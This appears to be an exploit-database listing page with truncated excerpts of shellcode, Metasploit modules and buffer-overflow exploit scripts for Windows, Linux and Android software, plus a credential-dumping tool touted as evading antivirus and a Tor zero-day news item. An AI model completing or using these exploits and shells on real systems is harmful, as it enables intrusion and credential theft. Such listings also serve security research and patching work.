Exploit the Credentials Present in Files and Memory: PowerMemory
PowerMemory is a PowerShell post-exploitation tool. It uses Microsoft binaries and therefore is able to execute on a machine, even after the Device Guard Policies have been set. In the same way, it will bypass antivirus detection. PowerMemory can retrieve credentials information and manipulate...
Windows x64 - Password Protected Bind Shellcode (825 bytes)
Windows x64 - Password Protected Bind Shellcode 825 bytes. Shellcode exploit for Winx86-64 platform / Title : Windows x64 Password Protected Bind Shell TCP shellcode size : 825 bytes Author : Roziul Hasan Khan Shifat Tested On : Windows 7 x64 professional Date : 01-01-2017 / / file format pe-x86-...
Windows/x64 - Password Protected Bind Shellcode (825 bytes)
/ Title : Windows x64 Password Protected Bind Shell TCP shellcode size : 825 bytes Author : Roziul Hasan Khan Shifat Tested On : Windows 7 x64 professional Date : 01-01-2017 / / file format pe-x86-64 Disassembly of section .text: 0000000000000000 : 0: 99 cltd 1: b2 80 mov $0x80,%dl 3: 48 29 d4 su...
Google Android - get_user/put_user (Metasploit)
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' require 'rex' class MetasploitModule "Android getuser/putuser Exploit", 'Description' = %q This module exploits a missing check in the getuser and...
Android get_user/put_user Exploit
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' require 'rex' class MetasploitModule "Android getuser/putuser Exploit", 'Description' = %q This module exploits a missing check in the getuser and...
Linux/x86 - /bin/bash -c Arbitrary Command Execution Shellcode (72 bytes)
/ ;author: Filippo "zinzloun" Bersani ;date: 16/12/2016 ;version: 1.0 ;X86 Assembly/NASM Syntax ;tested on: Linux OpenSuse001 2.6.34-12-desktop 32bit ; Linux ubuntu 3.13.0-100-generic 147precise1-Ubuntu 32bit ; Linux bb32 4.4.0-45-generic 32bit ;72 bytes ;description: executes arbitrary command...
Linux/x86 - /bin/bash -c Arbitrary Command Execution Shellcode (72 bytes)
Linux/x86 - /bin/bash -c Arbitrary Command Execution Shellcode 72 bytes. Shellcode exploit for Linx86 platform / ;author: Filippo "zinzloun" Bersani ;date: 16/12/2016 ;version: 1.0 ;X86 Assembly/NASM Syntax ;tested on: Linux OpenSuse001 2.6.34-12-desktop 32bit ; Linux ubuntu 3.13.0-100-generic...
Using ROP and Heap Spray in IE8 to bounce a shell - vulnerability warning - the black bar safety net
This exploit targets the IE8 browser on the Windows 7 platform. The focus of our attention is the Java Network Launch Protocol (JNLP) plug-in, which has an overflow vulnerability. To exploit it, I will use Heaplib to construct a ROP chain in order...
Android get_user/put_user Exploit
This module exploits a missing check in the getuser and putuser API functions in the linux kernel before 3.5.5. The missing checks on these functions allow an unprivileged user to read and write kernel memory. This exploit first reads the kernel memory to identify the commitcreds and ptmxfops...
10-Strike Network File Search Pro 2.3 - SEH Local Buffer Overflow Exploit
Exploit for windows platform in category local exploits !python Exploit title: 10-Strike Network File Search Pro 2.3 Registration code SEH exploit Date: 2016-12-10 Vendor homepage: https://www.10-strike.com/network-file-search/help/pro.shtml Download:...
10-Strike Network File Search Pro 2.3 Buffer Overflow
!python Exploit title: 10-Strike Network File Search Pro 2.3 Registration code SEH exploit Date: 2016-12-10 Vendor homepage: https://www.10-strike.com/network-file-search/help/pro.shtml Download: https://www.10-strike.com/network-file-search/network-file-search-pro.exe Tested on: Win7 SP1 Author:...
10-Strike Network File Search Pro 2.3 - Local Buffer Overflow (SEH)
10-Strike Network File Search Pro 2.3 - Local Buffer Overflow SEH !python Exploit title: 10-Strike Network File Search Pro 2.3 Registration code SEH exploit Date: 2016-12-10 Vendor homepage: https://www.10-strike.com/network-file-search/help/pro.shtml Download:...
Windows/x64 - Bind Shell TCP Shellcode (508 bytes)
/ Title : Windows x64 Bind Shell TCP Shellcode size : 508 bytes Date : 08-12-2016 Author : Roziul Hasan Khan Shifat Tested On : Windows 7 Professional x64 / / section .text global start start: xor rdx,rdx mov rax,gs:rdx+0x60 mov rsi,rax+0x18 mov rsi,rsi+0x10 lodsq mov rsi,rax mov r14,rsi+0x30...
Windows x64 - Bind Shell TCP Shellcode (508 bytes)
Windows x64 - Bind Shell TCP Shellcode 508 bytes. Shellcode exploit for Winx86-64 platform / Title : Windows x64 Bind Shell TCP Shellcode size : 508 bytes Date : 08-12-2016 Author : Roziul Hasan Khan Shifat Tested On : Windows 7 Professional x64 / / section .text global start start: xor rdx,rdx m...
Linux/x86 - Netcat (-e option disabled) Reverse Shell Shellcode (180 bytes)
/ ;author: Filippo "zinzloun" Bersani ;date: 05/12/2016 ;version: 1.0 ;X86 Assembly/NASM Syntax ;tested on: Linux OpenSuse001 2.6.34-12-desktop 32bit ; Linux ubuntu 3.13.0-100-generic 147precise1-Ubuntu 32bit ; Linux bb32 4.4.0-45-generic 32bit ; description: get a reverse shell executing a shell...
Linux/x86 - Netcat (-e option disabled) Reverse Shell Shellcode (180 bytes)
Linux/x86 - Netcat -e option disabled Reverse Shell Shellcode 180 bytes. Shellcode exploit for Linx86 platform / ;author: Filippo "zinzloun" Bersani ;date: 05/12/2016 ;version: 1.0 ;X86 Assembly/NASM Syntax ;tested on: Linux OpenSuse001 2.6.34-12-desktop 32bit ; Linux ubuntu 3.13.0-100-generic...
Disk Savvy Enterprise 9.1.14 - GET Remote Buffer Overflow
Disk Savvy Enterprise 9.1.14 - GET Remote Buffer Overflow !/usr/bin/python import socket,os,time SEH Stack Overflow in GET request Disk Savvy Enterprise 9.1.14 Tested on Windows XP SP3 && Windows 7 Professional host = "192.168.1.20" port = 80 badchars \x00\x09\x0a\x0d\x20 msfvenom -a x86 --platfo...
Tor Patched Against Zero Day Under Attack
Update The Tor Project has provided a browser update that patches a zero-day vulnerability being exploited in the wild to de-anonymize Tor users. “The security flaw responsible for this urgent release is already actively exploited on Windows systems. Even though there is currently, to the best of...
Disk Pulse Enterprise 9.1.16 Buffer Overflow
!/usr/bin/python print "Disk Pulse Enterprise 9.1.16 Login Buffer Overflow" print "Author: Tulpa / tulpaattulpa-securitydotcom" Author website: www.tulpa-security.com Author twitter: @tulpasecurity Exploit will land you NT AUTHORITY\SYSTEM You do not need to be authenticated, password below is...
Disk Sorter Enterprise 9.1.12 - Login Remote Buffer Overflow
Disk Sorter Enterprise 9.1.12 - Login Remote Buffer Overflow !/usr/bin/python print "Disk Sorter Enterprise 9.1.12 Login Buffer Overflow" print "Author: Tulpa / tulpaattulpa-securitydotcom" Author website: www.tulpa-security.com Author twitter: @tulpasecurity Exploit will land you NT...